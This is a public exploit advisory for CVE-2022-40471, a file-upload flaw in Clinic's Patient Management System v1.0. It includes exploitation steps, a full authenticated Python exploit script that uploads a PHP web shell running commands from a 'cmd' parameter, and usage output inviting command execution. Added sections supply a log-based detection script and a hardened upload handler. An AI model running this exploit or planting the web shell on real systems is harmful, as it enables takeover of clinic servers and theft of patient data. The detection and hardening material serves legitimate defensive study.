CVE-2022-40471 Remote Code Execution in Clinic's Patient Management System v1.0
Date: September 9, 2022
Last Updated: October 16, 2022
Exploit Source: Exploit Code
Vendor Homepage: Clinic’s Patient Management System Source Code
Software Link: Download Clinic’s Patient Management System v1.0
Tested Platforms: Windows 10, Kali Linux
Description:
The Clinic’s Patient Management System v1.0 contains a severe vulnerability (CVE-2022-40471) allowing remote attackers to execute arbitrary code. This vulnerability arises due to improper handling of user-uploaded profile pictures in the ‘users.php’ module. Malicious actors can exploit this flaw to upload a PHP web shell, gaining unauthorized access and execution capabilities within the system.
Affected components - Source Code
In the following source code we can see that the developer allows any uploaded media file to be stored directly, without restricting it to a specific extension. This means a file with any extension can be uploaded, which is not acceptable for security reasons; using this flaw in the upload functionality, an attacker could upload a malicious web shell and gain complete access to the server with root privileges.
Vulnerable Page - users.php
// users.php
// The uploaded file is moved straight into the web-served user_images/
// directory; neither the extension nor the content of the file is checked,
// so a PHP file is stored and later served as an executable script.
$status = move_uploaded_file(
    $_FILES["profile_picture"]["tmp_name"],
    'user_images/' . $targetFile
);
if ($status) {
    try {
        $con->beginTransaction();
        $query = "INSERT INTO `users`(`display_name`,
            `user_name`, `password`, `profile_picture`)
            VALUES('$displayName', '$userName', '$encryptedPassword', '$targetFile');";
        $stmtUser = $con->prepare($query);
        $stmtUser->execute();
        $con->commit();
        $message = 'user registered successfully';
    } catch (PDOException $ex) {
        $con->rollback();
        echo $ex->getTraceAsString();
        echo $ex->getMessage();
        exit;
    }
} else {
    $message = 'a problem occured in image uploading.';
}
header("location:congratulation.php?goto_page=users.php&message=$message");
exit;
}
Exploitation Steps:
To exploit this vulnerability, an attacker can perform the following steps:
- Create a customized PHP web shell.
- Utilize the ‘users.php’ module to upload the crafted web shell as a profile picture, alongside specifying a Display Name, Username, and Password.
- Access the uploaded shell via the ‘pms/user_images/’ directory.
- Intercept the shell’s URL using BurpSuite and proceed to manipulate system commands by appending them after ‘pms/user_images/.shell.php?cmd=your_command_here’.
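The steps above leave a clear trace in the web server's access log: a request for a file under the profile-picture directory whose extension is not an image type. The following PHP CLI script is an added detection example written for this advisory; it is not part of the original post or of the Clinic's Patient Management System. It assumes Apache combined log format and the `/pms/user_images/` path used by the application; the log lines embedded in it are constructed samples.

```php
<?php
// Added example (not the project's code): flag web-server requests that
// fetch non-image files from the profile-picture upload directory.

const UPLOAD_PREFIX = '/pms/user_images/';          // path used by the application
const IMAGE_EXT     = ['jpg', 'jpeg', 'png', 'gif']; // extensions a profile picture may have

// Constructed sample log lines in Apache combined format.
$sampleLog = <<<'LOG'
10.0.0.5 - - [16/Oct/2022:10:01:12 +0000] "GET /pms/user_images/1663988032avatar.png HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.9 - - [16/Oct/2022:10:02:40 +0000] "POST /pms/users.php HTTP/1.1" 302 0 "http://10.0.0.1/pms/users.php" "python-requests/2.28.1"
10.0.0.9 - - [16/Oct/2022:10:02:41 +0000] "GET /pms/user_images/1663988032shell.php?cmd=whoami HTTP/1.1" 200 18 "-" "curl/7.85.0"
10.0.0.5 - - [16/Oct/2022:10:03:02 +0000] "GET /pms/index.php HTTP/1.1" 200 2211 "-" "Mozilla/5.0"
LOG;

/**
 * Return the entries whose request path lies under UPLOAD_PREFIX but whose
 * extension is not an image type, i.e. a script being served from the upload
 * directory. Each entry carries the client IP, the path and the query string.
 */
function findSuspiciousUploadHits(string $log): array
{
    $hits = [];
    foreach (explode("\n", trim($log)) as $line) {
        // Capture the client IP and the request target from the quoted request line.
        if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP/', $line, $m)) {
            continue;
        }
        [, $ip, $target] = $m;
        $path = parse_url($target, PHP_URL_PATH) ?? '';
        if (strpos($path, UPLOAD_PREFIX) !== 0) {
            continue;
        }
        $ext = strtolower(pathinfo($path, PATHINFO_EXTENSION));
        if (in_array($ext, IMAGE_EXT, true)) {
            continue;
        }
        $hits[] = [
            'ip'    => $ip,
            'path'  => $path,
            'query' => parse_url($target, PHP_URL_QUERY),
        ];
    }
    return $hits;
}

foreach (findSuspiciousUploadHits($sampleLog) as $hit) {
    printf("ALERT %s requested %s (query: %s)\n", $hit['ip'], $hit['path'], $hit['query'] ?? '-');
}
```

Run with `php detect_upload_hits.php`; on the sample data only the third line is reported. Matching on the extension rather than on a query parameter such as `cmd` keeps the rule independent of how a particular shell takes its input; a successful `POST /pms/users.php` from a non-browser user agent shortly before such a hit is a useful secondary signal.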
Exploit Code Overview:
The provided Python script automates the exploitation process. It conducts authentication with the target, facilitates the upload of the malicious PHP web shell via crafted HTTP requests, and outputs the successful upload URL for the shell.
from bs4 import *
import requests
import sys
import time


class RemoteCodeExecution:
    @staticmethod
    def auth(target_ip, target_port, uri_path, username, password):
        url = f'http://{target_ip}{uri_path}index.php'
        session = requests.get(url)
        cookies = (f"PHPSESSID={session.cookies['PHPSESSID']}")
        header = {
            'Host': target_ip,
            'Origin': 'http://' + target_ip,
            'Referer': 'http://' + target_ip + uri_path,
            'Cookie': cookies
        }
        data_body = {
            'username': username,
            'password': password,
        }
        url_auth = f'http://{target_ip}:{target_port}{uri_path}index.php'
        authentication = requests.post(url_auth, headers=header, data=data_body)
        if 'false' in authentication.text:
            print('[-] Username or password are incorrect, Try again')
            exit()
        else:
            print("[+] Exploit Title: Remote Code Execution (Authenticated) in Clinic's Patient Management System")
            print("[+] Author: RashidKhan Pathan {iHexCoder}")
            print("[@] Twitter: @itRashid")
            print("")
            time.sleep(1)
            print('[+] Authentication completed successfully,')
            print('[+] Uploading The Webshell')
            return cookies

    @staticmethod
    def exploit(target_ip, target_port, uri_path, cookies):
        header = {
            'Host': target_ip,
            'Content-Type': 'multipart/form-data; boundary=---------------------------405058720612140838201526428067',
            'Content-Length': '777',
            'Origin': 'http://' + target_ip,
            'Connection': 'close',
            'Cookie' : cookies,
            'Referer': 'http://' + target_ip + uri_path + 'users.php',
            'Upgrade-Insecure-Requests': '1'
        }
        data_body = '-----------------------------405058720612140838201526428067\r\nContent-Disposition: form-data; name="display_name\r\n\r\nRCEExploit\r\n-----------------------------405058720612140838201526428067\r\nContent-Disposition: form-data; name="user_name"\r\n\r\nRCEExploit\r\n-----------------------------405058720612140838201526428067\r\nContent-Disposition: form-data; name="password"\r\n\r\nRCEEXPLOIT\r\n-----------------------------405058720612140838201526428067\r\nContent-Disposition: form-data; name="profile_picture"; filename="shell.php"\r\nContent-Type: application/octet-stream\r\n\r\n<?php echo shell_exec($_GET["cmd"]); ?>\r\n-----------------------------405058720612140838201526428067\r\nContent-Disposition: form-data; name="save_user"\r\n\r\n-----------------------------405058720612140838201526428067--"; filename="webshell.php"\r\nContent-Type: application/octet-stream\r\n\r\n<?php echo shell_exec($_GET["cmd"]); ?>\r\n-----------------------------29635348012019605651675807433\r\nContent-Disposition: form-data; name="change\r\n\r\n-----------------------------29635348012019605651675807433--\r\n'
        uplaod_url = f"http://{target_ip}:{target_port}{uri_path}users.php"
        requests.post(uplaod_url, headers=header, data=data_body)


def main():
    if len(sys.argv) != 6:
        time.sleep(1)
        print("[+] Author: RashidKhan Pathan {iHexCoder}")
        print("[@] Twitter: @itRashid")
        time.sleep(1)
        print('Incorrect parameters!\r\n[!] Useage: python3 CVE-2022-40471.py <target_ip> <target_port> <target_uri> <username> <password>')
        print("[!] Example: python3 CVE-2022-40471.py 127.0.0.1 80 /pms/ UserName Password")
        exit()
    target_ip = sys.argv[1]
    target_port = sys.argv[2]
    uri_path = sys.argv[3]
    username = sys.argv[4]
    password = sys.argv[5]
    cookies = RemoteCodeExecution.auth(target_ip, target_port, uri_path, username, password)
    RemoteCodeExecution.exploit(target_ip, target_port, uri_path, cookies)
    print(f'[+] Webshell uploaded successfully to: http://{target_ip}:{target_port}{uri_path}user_images/')
    print("[+] Enjoy your shell")
    print("[!] Note: In this Exploitation Scenario, Shell Changes the Random Digit after Uploading")
    print("[!] So Can use Any Uploaded Shell with Random Number ")
    print("[!] Copy The One of The Follwing Shell and Exploit it Using Curl ie: http://YourIP/pms/user_images/1663988032shell.php?cmd=whoami")
    print("")
    print("[+] Uploaded Shell")

    def get_url_paths(url, ext='', params={}):
        response = requests.get(url, params=params)
        if response.ok:
            response_text = response.text
        else:
            return response.raise_for_status()
        soup = BeautifulSoup(response_text, 'html.parser')
        parent = [url + node.get('href') for node in soup.find_all('a') if node.get('href').endswith(ext)]
        return parent

    url = 'http://localhost/pms/user_images/'
    ext = 'php'
    result = get_url_paths(url, ext)
    print(result)


if __name__ == '__main__':
    main()
Mitigations and Recommendations:
- Immediate Update: Users are strongly advised to update the Clinic’s Patient Management System to a patched version that addresses this critical vulnerability.
- Restrict File Uploads: Implement stricter validation for file uploads, especially image files. In the profile picture upload functionality, reject all other extensions and allow only .jpg and .png, which are image types, to prevent the execution of arbitrary code.
- Regular Security Audits: Conduct regular security audits and penetration testing to identify and patch potential vulnerabilities in the system.
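The "Restrict File Uploads" recommendation can be applied to the users.php fragment shown above. The following is an added hardened version written for this advisory; it is not the project's own patch. It assumes, as in the original fragment, that `$con` is a PDO connection and that `$displayName`, `$userName` and `$encryptedPassword` have already been set. Beyond the extension allowlist the advisory asks for, it also sniffs the content type from the file bytes, discards the client-supplied filename in favour of a server-chosen random one, and uses bound parameters in place of the string-built query in the original.

```php
<?php
// Added example (not the project's code): hardened profile-picture handling
// for users.php. Assumes $con (PDO), $displayName, $userName and
// $encryptedPassword are set exactly as in the original fragment.

const UPLOAD_DIR = __DIR__ . '/user_images/';
const MAX_BYTES  = 2 * 1024 * 1024;   // 2 MiB cap; an assumed limit
// Sniffed MIME type => extension the stored file will get.
const ALLOWED    = ['image/jpeg' => 'jpg', 'image/png' => 'png'];

/**
 * Validate an uploaded image and store it under a server-chosen name.
 * Returns the stored filename, or null if the upload must be rejected.
 * The client-supplied name and extension are never used.
 */
function storeProfilePicture(array $file): ?string
{
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        return null;
    }
    if ($file['size'] > MAX_BYTES || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    // Sniff the real content type from the bytes, not from $_FILES['type'].
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if (!isset(ALLOWED[$mime])) {
        return null;
    }
    // Second, independent check that the file parses as an image.
    if (getimagesize($file['tmp_name']) === false) {
        return null;
    }
    // Random name plus an extension derived from the sniffed type.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED[$mime];
    $dest = UPLOAD_DIR . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return null;
    }
    chmod($dest, 0644);   // readable, never executable
    return $name;
}

$targetFile = storeProfilePicture($_FILES['profile_picture'] ?? []);
if ($targetFile === null) {
    $message = 'only JPEG or PNG profile pictures are accepted.';
} else {
    try {
        $con->beginTransaction();
        // Bound parameters instead of interpolating user input into the SQL string.
        $stmtUser = $con->prepare(
            'INSERT INTO `users` (`display_name`, `user_name`, `password`, `profile_picture`)
             VALUES (:display_name, :user_name, :password, :profile_picture)'
        );
        $stmtUser->execute([
            ':display_name'    => $displayName,
            ':user_name'       => $userName,
            ':password'        => $encryptedPassword,
            ':profile_picture' => $targetFile,
        ]);
        $con->commit();
        $message = 'user registered successfully';
    } catch (PDOException $ex) {
        $con->rollBack();
        error_log($ex->getMessage());   // log server-side; never echo traces to the client
        $message = 'registration failed.';
    }
}
header('Location: congratulation.php?goto_page=users.php&message=' . urlencode($message));
exit;
```

The decisive controls here are the server-chosen filename and extension, which stop a `.php` name from ever reaching the directory. The MIME and `getimagesize` checks are defence in depth rather than a guarantee, since a file that begins with valid image headers can still carry script text, so the `user_images/` directory should additionally have script execution disabled in the web server configuration.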
Disclaimer:
This exploit demonstration and information are solely for educational purposes and security awareness. Use this knowledge responsibly and only on systems where you have explicit permission for testing or demonstration. - By Author